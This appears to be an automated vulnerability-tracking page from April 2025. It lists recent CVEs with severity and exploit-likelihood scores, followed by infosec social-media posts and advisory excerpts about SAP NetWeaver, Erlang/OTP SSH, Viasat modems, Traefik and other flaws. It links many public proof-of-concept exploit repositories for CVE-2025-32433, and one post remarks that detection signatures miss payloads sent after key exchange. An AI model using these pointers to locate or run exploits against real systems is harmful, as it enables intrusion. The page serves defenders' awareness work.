Updated at UTC 2025-04-26T05:03:55.977040
CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
---|---|---|---|---|---|---|---|
CVE-2025-31324 | 10.0 | 0.04% | 9 | 1 | | 2025-04-26T01:15:41.930000 | SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper a |
CVE-2025-32433 | 10.0 | 3.62% | 16 | 17 | template | 2025-04-25T23:15:16.993000 | Erlang/OTP is a set of libraries for the Erlang programming language. Prior to v |
CVE-2025-3935 | 8.1 | 0.00% | 2 | 0 | | 2025-04-25T21:31:39 | ScreenConnect versions 25.2.3 and earlier versions may be susceptible to a ViewS |
CVE-2025-2069 | 5.0 | 0.00% | 2 | 0 | | 2025-04-25T18:31:19 | A cross-site scripting vulnerability was reported in the FileZ client that could |
CVE-2025-3928 | 8.8 | 0.00% | 2 | 0 | | 2025-04-25T18:31:12 | Commvault Web Server has an unspecified vulnerability that can be exploited by a |
CVE-2025-3634 | 4.3 | 0.00% | 4 | 0 | | 2025-04-25T16:30:58 | A security vulnerability was discovered in Moodle that allows students to enroll |
CVE-2024-6199 | None | 0.00% | 2 | 0 | | 2025-04-25T15:31:29 | An unauthenticated attacker on the WAN interface, with the ability to intercept |
CVE-2024-6198 | None | 0.00% | 4 | 0 | | 2025-04-25T15:31:29 | The device exposes a web interface on ports TCP/3030 and TCP/9882. This web serv |
CVE-2025-43946 | 9.8 | 0.29% | 1 | 0 | | 2025-04-25T15:31:21 | TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload |
CVE-2025-32431 | None | 0.07% | 1 | 0 | | 2025-04-25T14:41:50 | ## Impact There is a potential vulnerability in Traefik managing the requests u |
CVE-2025-46616 | 10.0 | 0.18% | 1 | 0 | | 2025-04-25T09:31:56 | Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code |
CVE-2025-43859 | 9.1 | 0.03% | 1 | 0 | | 2025-04-24T21:41:39 | ### Impact A leniency in h11's parsing of line terminators in chunked-coding me |
CVE-2024-32752 | 9.1 | 0.21% | 1 | 0 | | 2025-04-24T21:32:50 | Under certain circumstances communications between the ICU tool and an iSTAR Pro |
CVE-2025-26382 | None | 0.04% | 2 | 0 | | 2025-04-24T21:31:54 | Under certain circumstances the iSTAR Configuration Utility (ICU) tool could hav |
CVE-2025-43858 | 9.2 | 0.02% | 1 | 0 | | 2025-04-24T19:20:07 | ## Summary This vulnerability only apply when running on a Windows OS. An unsafe |
CVE-2025-43928 | 5.8 | 0.04% | 2 | 0 | | 2025-04-24T18:32:12 | In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654 |
CVE-2025-28020 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A800R V4.1.2cu.5137_B20200730 was found to contain a buffer overflow vu |
CVE-2025-28021 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu |
CVE-2025-28028 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A830R V4.1.2cu.5182_B20201102, A950RG V4.1.2cu.5161_B20200903, A3000RU |
CVE-2025-28022 | 7.3 | 0.04% | 1 | 0 | | 2025-04-24T18:32:10 | TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu |
CVE-2025-27820 | 7.5 | 0.01% | 1 | 0 | | 2025-04-24T16:36:11 | A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, |
CVE-2025-43919 | 5.8 | 0.16% | 3 | 2 | | 2025-04-24T16:22:37.117000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac |
CVE-2025-43920 | 5.4 | 0.12% | 2 | 1 | | 2025-04-24T16:20:36.953000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), in certain external archiver |
CVE-2025-43921 | 5.3 | 0.03% | 3 | 1 | | 2025-04-24T16:16:59.597000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac |
CVE-2025-43855 | None | 0.07% | 1 | 0 | | 2025-04-24T16:03:58 | ### Summary An unhandled error is thrown when validating invalid connectionPara |
CVE-2025-30408 | 6.7 | 0.01% | 1 | 0 | | 2025-04-24T15:31:46 | Local privilege escalation due to insecure folder permissions. The following pro |
CVE-2025-46421 | 6.8 | 0.03% | 1 | 0 | | 2025-04-24T15:31:44 | A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, th |
CVE-2025-30409 | 5.5 | 0.01% | 1 | 0 | | 2025-04-24T15:31:44 | Denial of service due to allocation of resources without limits. The following p |
CVE-2025-3872 | 7.2 | 0.02% | 1 | 0 | | 2025-04-24T12:31:35 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti |
CVE-2024-12244 | 4.3 | 0.01% | 1 | 0 | | 2025-04-24T09:30:40 | An issue has been discovered in access controls could allow users to view certai |
CVE-2025-1908 | 7.7 | 0.01% | 1 | 0 | | 2025-04-24T09:30:40 | An issue has been discovered in GitLab EE/CE that could allow an attacker to tra |
CVE-2025-0639 | 6.5 | 0.03% | 1 | 0 | | 2025-04-24T09:30:40 | An issue has been discovered affecting service availability via issue preview in |
CVE-2025-32730 | 5.5 | 0.03% | 1 | 0 | | 2025-04-24T09:30:40 | Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool af |
CVE-2025-1731 | 7.8 | 0.01% | 4 | 0 | | 2025-04-24T06:30:31 | An incorrect permission assignment vulnerability in the PostgreSQL commands of t |
CVE-2025-1976 | None | 0.03% | 1 | 0 | | 2025-04-24T03:31:38 | Brocade Fabric OS versions starting with 9.1.0 have root access removed, however |
CVE-2025-46419 | 5.9 | 0.06% | 1 | 0 | | 2025-04-24T03:31:38 | Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet. |
CVE-2025-32818 | 7.5 | 0.04% | 1 | 0 | | 2025-04-23T21:30:42 | A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office in |
CVE-2025-32969 | None | 0.24% | 1 | 0 | | 2025-04-23T19:15:38 | ### Impact It is possible for a remote unauthenticated user to escape from the |
CVE-2025-2773 | 7.2 | 0.33% | 1 | 0 | | 2025-04-23T18:31:07 | BEC Technologies Multiple Routers sys ping Command Injection Remote Code Executi |
CVE-2025-2772 | 5.3 | 0.03% | 1 | 0 | | 2025-04-23T18:31:07 | BEC Technologies Multiple Routers Insufficiently Protected Credentials Informati |
CVE-2025-2770 | 4.9 | 0.10% | 1 | 0 | | 2025-04-23T18:31:06 | BEC Technologies Multiple Routers Cleartext Password Storage Information Disclos |
CVE-2025-2771 | 5.3 | 0.10% | 1 | 0 | | 2025-04-23T18:31:06 | BEC Technologies Multiple Routers Authentication Bypass Vulnerability. This vuln |
CVE-2025-2767 | 8.8 | 0.21% | 1 | 0 | | 2025-04-23T18:31:00 | Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnera |
CVE-2025-27087 | 5.5 | 0.01% | 1 | 0 | | 2025-04-23T15:32:02 | A vulnerability in the kernel of the Cray Operating System (COS) could allow an |
CVE-2024-33452 | 7.7 | 0.11% | 1 | 0 | | 2025-04-23T14:08:13.383000 | An issue in OpenResty lua-nginx-module v.0.10.26 and before allows a remote atta |
CVE-2025-1951 | 8.4 | 0.01% | 1 | 0 | | 2025-04-23T14:08:13.383000 | IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co |
CVE-2025-29660 | 9.8 | 0.07% | 1 | 0 | | 2025-04-23T14:08:13.383000 | A vulnerability exists in the daemon process of the Yi IOT XY-3820 v6.0.24.10, w |
CVE-2025-29659 | 9.8 | 0.21% | 1 | 0 | | 2025-04-23T14:08:13.383000 | Yi IOT XY-3820 6.0.24.10 is vulnerable to Remote Command Execution via the "cmd_ |
CVE-2025-2703 | 6.8 | 0.01% | 2 | 0 | | 2025-04-23T12:31:31 | The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user |
CVE-2025-2595 | 5.3 | 0.02% | 1 | 0 | | 2025-04-23T09:33:37 | An unauthenticated remote attacker can bypass the user management in CODESYS Vis |
CVE-2025-0926 | 5.9 | 0.01% | 1 | 0 | | 2025-04-23T06:31:26 | Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that |
CVE-2025-1056 | 6.1 | 0.01% | 1 | 0 | | 2025-04-23T06:31:26 | Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified |
CVE-2025-46221 | None | 0.00% | 1 | 0 | | 2025-04-23T03:30:35 | Rejected reason: Not used |
CVE-2025-1021 | 7.5 | 0.04% | 1 | 0 | | 2025-04-23T03:30:30 | Missing authorization vulnerability in synocopy in Synology DiskStation Manager |
CVE-2025-32965 | None | 0.04% | 1 | 1 | | 2025-04-22T23:53:56 | ### Impact Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised a |
CVE-2025-34028 | 10.0 | 0.31% | 13 | 2 | | 2025-04-22T18:32:18 | A path traversal vulnerability in Commvault Command Center Innovation Release al |
CVE-2025-27086 | 8.1 | 0.06% | 2 | 0 | | 2025-04-22T15:31:59 | Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPC |
CVE-2025-1950 | 9.4 | 0.01% | 2 | 0 | | 2025-04-22T15:30:58 | IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co |
CVE-2025-1732 | 6.7 | 0.01% | 1 | 0 | | 2025-04-22T03:30:32 | An improper privilege management vulnerability in the recovery function of the U |
CVE-2025-43972 | 6.8 | 0.06% | 1 | 0 | | 2025-04-21T21:55:34 | An issue was discovered in GoBGP before 3.35.0. An attacker can cause a crash in |
CVE-2025-43971 | 8.6 | 0.04% | 1 | 0 | | 2025-04-21T21:55:26 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/bgp/bgp.go allows att |
CVE-2025-43970 | 4.3 | 0.02% | 1 | 0 | | 2025-04-21T21:55:19 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/mrt/mrt.go does not p |
CVE-2025-32408 | 2.5 | 0.01% | 1 | 0 | | 2025-04-21T17:15:24.117000 | In Soffid Console 3.6.31 before 3.6.32, authorization to use the pam service is |
CVE-2025-43916 | 3.4 | 0.03% | 1 | 0 | | 2025-04-21T14:23:45.950000 | Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is use |
CVE-2025-43973 | 6.8 | 0.04% | 1 | 0 | | 2025-04-21T14:23:45.950000 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/rtr/rtr.go does not v |
CVE-2025-43918 | 6.4 | 0.01% | 1 | 0 | | 2025-04-20T00:31:48 | SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, pro |
CVE-2025-3803 | 8.8 | 0.05% | 1 | 0 | | 2025-04-19T15:30:28 | A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h |
CVE-2025-3802 | 8.8 | 0.05% | 1 | 0 | | 2025-04-19T15:30:23 | A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h |
CVE-2025-32434 | None | 0.41% | 2 | 0 | | 2025-04-18T18:34:25 | # Description I found a Remote Command Execution (RCE) vulnerability in the PyTo |
CVE-2025-42599 | 9.8 | 0.30% | 2 | 0 | | 2025-04-18T15:31:44 | Active! mail 6 BuildInfo: 6.60.05008561 and earlier contains a stack-based buffe |
CVE-2025-24054 | 6.5 | 17.54% | 4 | 3 | | 2025-04-18T14:15:17.677000 | External control of file name or path in Windows NTLM allows an unauthorized att |
CVE-2025-2567 | 9.8 | 0.05% | 1 | 0 | | 2025-04-15T21:31:48 | An attacker could modify or disable settings, disrupt fuel monitoring and suppl |
CVE-2025-3587 | 6.3 | 0.04% | 1 | 0 | | 2025-04-15T18:39:27.967000 | A vulnerability classified as critical was found in ZeroWdd/code-projects studen |
CVE-2025-33028 | 6.1 | 0.04% | 1 | 0 | | 2025-04-15T18:31:58 | In WinZip through 29.0, there is a Mark-of-the-Web Bypass Vulnerability because |
CVE-2025-2636 | 9.8 | 0.25% | 1 | 0 | | 2025-04-11T15:39:52.920000 | The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vul |
CVE-2025-0120 | 0 | 0.02% | 1 | 0 | | 2025-04-11T15:39:52.920000 | A vulnerability with a privilege management mechanism in the Palo Alto Networks |
CVE-2025-3248 | 9.8 | 80.91% | 2 | 4 | template | 2025-04-10T01:59:49 | Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/ |
CVE-2025-21204 | 7.8 | 0.07% | 4 | 0 | | 2025-04-08T18:34:49 | Improper link resolution before file access ('link following') in Windows Update |
CVE-2024-48887 | 9.8 | 0.09% | 1 | 2 | | 2025-04-08T18:34:48 | A unverified password change vulnerability in Fortinet FortiSwitch GUI may allo |
CVE-2025-29927 | 9.1 | 92.56% | 1 | 81 | template | 2025-03-28T15:32:59 | # Impact It is possible to bypass authorization checks within a Next.js applicat |
CVE-2024-54085 | None | 0.11% | 1 | 0 | | 2025-03-28T15:32:58 | AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authe |
CVE-2025-1974 | 9.8 | 80.23% | 1 | 17 | template | 2025-03-25T15:10:16 | A security issue was discovered in Kubernetes where under certain conditions, an |
CVE-2025-27840 | 6.8 | 0.07% | 1 | 3 | | 2025-03-11T18:32:12 | Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory |
CVE-2025-27610 | 7.5 | 0.09% | 6 | 0 | | 2025-03-10T23:15:35.073000 | Rack provides an interface for developing web applications in Ruby. Prior to ver |
CVE-2025-0725 | 7.3 | 0.21% | 1 | 0 | | 2025-03-07T03:31:33 | When libcurl is asked to perform automatic gzip decompression of content-encoded |
CVE-2025-27111 | 0 | 0.12% | 4 | 0 | | 2025-03-04T16:15:40.487000 | Rack is a modular Ruby web server interface. The Rack::Sendfile middleware logs |
CVE-2022-42475 | 9.8 | 93.18% | 1 | 7 | | 2025-02-24T18:32:12 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th |
CVE-2025-25184 | 0 | 0.10% | 4 | 0 | | 2025-02-14T20:15:34.350000 | Rack provides an interface for developing web applications in Ruby. Prior to ver |
CVE-2025-0282 | 9.1 | 92.34% | 7 | 10 | | 2025-01-28T18:32:27 | A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, |
CVE-2018-0171 | 9.8 | 89.10% | 1 | 2 | | 2025-01-27T21:31:51 | A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS |
CVE-2024-21762 | 9.8 | 91.37% | 1 | 8 | | 2024-11-29T15:23:32.167000 | A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 th |
CVE-2024-9441 | 9.8 | 57.36% | 1 | 4 | | 2024-10-02T21:30:35 | The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS comma |
CVE-2024-6235 | None | 21.21% | 1 | 0 | template | 2024-07-31T05:02:58 | Sensitive information disclosure in NetScaler Console |
CVE-2020-5902 | 9.8 | 94.44% | 1 | 57 | template | 2024-07-25T18:33:36 | In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12. |
CVE-2024-6407 | 9.8 | 0.14% | 1 | 0 | | 2024-07-11T12:30:56 | CWE-200: Information Exposure vulnerability exists that could cause disclosure o |
CVE-2023-27997 | 9.8 | 91.01% | 1 | 10 | | 2024-04-04T04:45:33 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an |
CVE-2024-3094 | 10.0 | 90.84% | 1 | 62 | template | 2024-03-29T18:30:50 | Malicious code was discovered in the upstream tarballs of xz, starting with vers |
CVE-2022-42889 | 9.8 | 94.16% | 1 | 49 | template | 2024-01-19T20:49:34 | Apache Commons Text performs variable interpolation, allowing properties to be d |
CVE-2025-3132 | 0 | 0.00% | 2 | 1 | | N/A | |
CVE-2025-22234 | 0 | 0.00% | 3 | 0 | | N/A | |
CVE-2025-1763 | 0 | 0.00% | 1 | 0 | | N/A | |
CVE-2025-2443 | 0 | 0.00% | 1 | 0 | | N/A | |
CVE-2024-55571 | 0 | 0.00% | 1 | 0 | | N/A | |
CVE-2025-21605 | 0 | 0.03% | 1 | 0 | | N/A | |
CVE-2025-32966 | 0 | 0.04% | 1 | 0 | | N/A | |
CVE-2025-32958 | 0 | 0.04% | 1 | 0 | | N/A | |
CVE-2025-32438 | 0 | 0.01% | 1 | 0 | | N/A | |
updated 2025-04-26T01:15:41.930000
9 posts
1 repos
SAP zero-day vulnerability under widespread active exploitation https://cyberscoop.com/sap-netweaver-zero-day-exploit-cve-2025-31324/
##More about the SAP NetWeaver zero-day vulnerability. A patch has been released.
Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday
##@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.
##Tracked as CVE-2025-31324 (CVSS score of 10/10), the security defect is described as the lack of proper authorization (missing authorization check) in the Visual Composer Metadata Uploader component of SAP NetWeaver. https://www.securityweek.com/sap-zero-day-possibly-exploited-by-initial-access-broker/
##🚨SAP NetWeaver Vulnerability (CVE-2025-31324) Allows Remote Code Execution via File Upload Flaw
##A perfect 10 in SAP NetWeaver? Yes please. 🥳
https://me.sap.com/notes/3594142
sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
##SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
updated 2025-04-25T23:15:16.993000
16 posts
17 repos
https://github.com/exa-offsec/ssh_erlangotp_rce
https://github.com/m0usem0use/erl_mouse
https://github.com/becrevex/CVE-2025-32433
https://github.com/rizky412/CVE-2025-32433
https://github.com/ekomsSavior/POC_CVE-2025-32433
https://github.com/ProDefense/CVE-2025-32433
https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC
https://github.com/Epivalent/CVE-2025-32433-detection
https://github.com/ps-interactive/lab_CVE-2025-32433
https://github.com/TeneBrae93/CVE-2025-3243
https://github.com/meloppeitreet/CVE-2025-32433-Remote-Shell
https://github.com/LemieOne/CVE-2025-32433
https://github.com/tobiasGuta/Erlang-OTP-CVE-2025-32433
https://github.com/teamtopkarl/CVE-2025-32433
https://github.com/darses/CVE-2025-32433
Cisco updated the list again. Here are the currently listed Cisco systems vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold ):
The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):
This was updated yesterday.
Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec
##For those playing along at home, here are the currently listed Cisco systems vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:
The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):
Cisco is investigating the impact of the Erlang/OTP remote code execution vulnerability CVE-2025-32433 on its products. https://www.securityweek.com/cisco-confirms-some-products-impacted-by-critical-erlang-otp-flaw/
##A few quick notes on the Erlang OTP SSHd RCE (CVE-2025-32433):
1. Cisco confirmed that ConfD and NSO products are affected (ports 830, 2022, and 2024 versus 22)
2. Signatures looking for clear-text channel open and exec calls will miss exploits that deliver the same payloads after the key exchange.
3. If you find a machine in your environment and can't disable the service, running the exploit with the payload `ssh:stop().` will shut down the SSH service temporarily.
##How I Used AI to Create a Working Exploit for CVE-2025-32433 Before Public PoCs Existed | Platform Security Blog https://platformsecurity.com/blog/CVE-2025-32433-poc
##Cisco, published yesterday (critical): Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec
##If your company sells a product with limited visibility into the underlying systems ( network appliances, etc. ) and you have not yet published an advisory or doc stating whether or not your products are impacted by the Erlang / OTP perfect 10 CVE-2025-32433, then you are not my friend and I hope you step on a lego in the middle of the night.
##The Register: Today’s LLMs craft exploits from patches at lightning speed . “Matthew Keely, of Platform Security and penetration testing firm ProDefense, managed to cobble together a working exploit for a critical vulnerability in Erlang’s SSH library (CVE-2025-32433) in an afternoon, although the AI he used had some help – the model was able to use code from an already published patch in the […]
##PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) https://www.helpnetsecurity.com/2025/04/22/working-poc-exploit-for-critical-erlang-otp-ssh-bug-is-public-cve-2025-32433/ #RuhrUniversityBochum #ArcticWolfNetworks #PlatformSecurity #vulnerability #Horizon3ai #ProDefense #Don'tmiss #Hotstuff #exploit #News #PoC #SSH
##Erlang/OTP RCE (CVE-2025-32433) https://fortiguard.fortinet.com/threat-signal-report/6077
##Critical Erlang/OTP SSH RCE bug now has public exploits, patch now
Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to...
🔗️ [Bleepingcomputer] https://link.is.it/weapzq
##Picus: CVE-2025-32433: Erlang/OTP SSH Remote Code Execution Vulnerability Explained https://www.picussecurity.com/resource/blog/cve-2025-32433-erlang-otp-ssh-remote-code-execution-vulnerability-explained #cybersecurity #Infosec
updated 2025-04-25T21:31:39
2 posts
Looks like there's a CVE for yesterday's ScreenConnect vuln now.
updated 2025-04-25T18:31:19
2 posts
Three vulns published in FileZ, all sev:MED 5.1
but this one sounded more interesting:
The FileZ client reported a cross-site scripting vulnerability; if a local user accesses a forged link, code could be executed. CVE-2025-2069
Translation via LibreWolf:
##The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069
updated 2025-04-25T18:31:12
2 posts
CVE published for a Commvault advisory from last month about "an unspecified vulnerability".
https://documentation.commvault.com/securityadvisories/CV_2025_03_1.html
sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.
updated 2025-04-25T16:30:58
4 posts
"Too much interest in Moodle courses" is not really such a common security problem at universities, is it? https://access.redhat.com/security/cve/CVE-2025-3634 #Moodle #CVE
##Who wants to skip courses in Moodle?
https://access.redhat.com/security/cve/CVE-2025-3634
##A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.
updated 2025-04-25T15:31:29
2 posts
Who doesn't like RCE in Viasat modems? Well here's two of them. Happy Friday.
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red
The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.
https://nvd.nist.gov/vuln/detail/CVE-2024-6198
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red
##An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.
updated 2025-04-25T15:31:29
4 posts
Who doesn't like RCE in Viasat modems? Well here's two of them. Happy Friday.
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red
The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.
https://nvd.nist.gov/vuln/detail/CVE-2024-6198
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red
##An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.
Remote Code Execution on Viasat Modems (CVE-2024-6198) https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
updated 2025-04-25T15:31:21
1 posts
Go hack more AI shit.
TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload (combined with Path Traversal).
https://github.com/Henkel-CyberVM/CVEs/blob/main/CVE-2025-43946/README.md
In case you don't know what TCPWave DDI is, this is the big banner on their homepage:
##Easy To Use DDI Powered with
Alice Chatbot
Core DDI with Advanced Threat Intelligence to mitigate risks
updated 2025-04-25T14:41:50
1 posts
A ../ in a popular reverse proxy and load balancer? Happy Monday! But at least we now know for sure how to pronounce it when we report it to the various teams.
https://github.com/traefik/traefik/security/advisories/GHSA-6p68-w45g-48j7
sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
##Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. In versions prior to 2.11.24, 3.3.6, and 3.4.0-rc2, there is a potential vulnerability in Traefik managing the requests using a PathPrefix, Path or PathRegex matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a /../ in its path, it’s possible to target a backend, exposed using another router, by-passing the middlewares chain. This issue has been patched in versions 2.11.24, 3.3.6, and 3.4.0-rc2. A workaround involves adding a PathRegexp rule to the matcher to prevent matching a route with a /../ in the path.
updated 2025-04-25T09:31:56
1 posts
I thought quantum was supposed to save security or something?
sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
##Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) via upload of a file. This affects StorNext RYO before 7.2.4, StorNext Xcellis Workflow Director before 7.2.4, and ActiveScale Cold Storage.
updated 2025-04-24T21:41:39
1 posts
HTTP Smuggling in Python h11.
https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj
sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
##h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.
updated 2025-04-24T21:32:50
1 posts
Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.
sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue
https://nvd.nist.gov/vuln/detail/CVE-2025-26382
This other advisory from last June was also updated today.
sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N
##Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.
updated 2025-04-24T21:31:54
2 posts
Johnson Controls reports critical vulnerability in ICU tool
A critical stack-based buffer overflow vulnerability (CVE-2025-26382, CVSS 9.8) in Johnson Controls' ICU tool affects versions prior to 6.9.5, allowing unauthenticated remote attackers to execute arbitrary code and potentially gain complete system control.
**If you are using Johnson Controls' ICU tool, the usual rules apply - Make sure it's isolated from the internet and accessible only from trusted networks. Then plan a patch, because every isolation can be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/johnson-controls-reports-critical-vulnerability-in-icu-tool-g-p-n-0-s/gD2P6Ple2L
updated 2025-04-24T19:20:07
1 posts
I've heard of people around here using youtube-dl. If you use the Youtube-DLSharp wrapper for it, heads-up.
https://github.com/Bluegrams/YoutubeDLSharp/security/advisories/GHSA-2jh5-g5ch-43q5
